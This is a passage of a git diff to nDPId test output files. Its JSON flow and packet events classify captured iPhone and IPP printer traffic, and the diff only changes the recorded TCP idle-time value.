-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} diff --git a/test/results/ipp.pcap.out b/test/results/ipp.pcap.out index e22b9d416..478ef3e6b 100644 --- a/test/results/ipp.pcap.out +++ b/test/results/ipp.pcap.out @@ -1,23 +1,23 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ipp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1210953938216} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} -00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} -00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA84QBAAEAGMHwKCgoxCgoK+9gtAnfcBg8oAAAAAKACFtBTiQAAAgQFtAQCCAoAa+4oAAAAAAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938217,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U54AAEAG\/d4KCgr7CgoKMQJ32C21dp4B3AYPKaASFtAViwAAAgQFtAEDAwABAQgKAFjtJABr7ig="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938217,"pkt":"ABJ5gGlgABtjmL82CABFAAA04QFAAEAGMIMKCgoxCgoK+9gtAnfcBg8ptXaeAoAQAC5X7gAAAQEICgBr7isAWO0k"} +00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938217,"flow_last_seen":1210953938217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953938217,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953938235,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953938235,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA8xghAAEAGS3QKCgoxCgoK+9guAnfcdyg0AAAAAKACFtA59wAAAgQFtAQCCAoAa+48AAAAAAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953938235,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8U6wAAEAG\/dAKCgr7CgoKMQJ32C61d5gB3HcoNaASFtAB+AAAAgQFtAEDAwABAQgKAFjtJABr7jw="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1210953938235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953938235,"pkt":"ABJ5gGlgABtjmL82CABFAAA0xglAAEAGS3sKCgoxCgoK+9guAnfcdyg1tXeYAoAQAC5EXQAAAQEICgBr7j0AWO0k"} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953938235,"flow_last_seen":1210953938236,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1210953938236,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1210953939430,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1210953939430,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 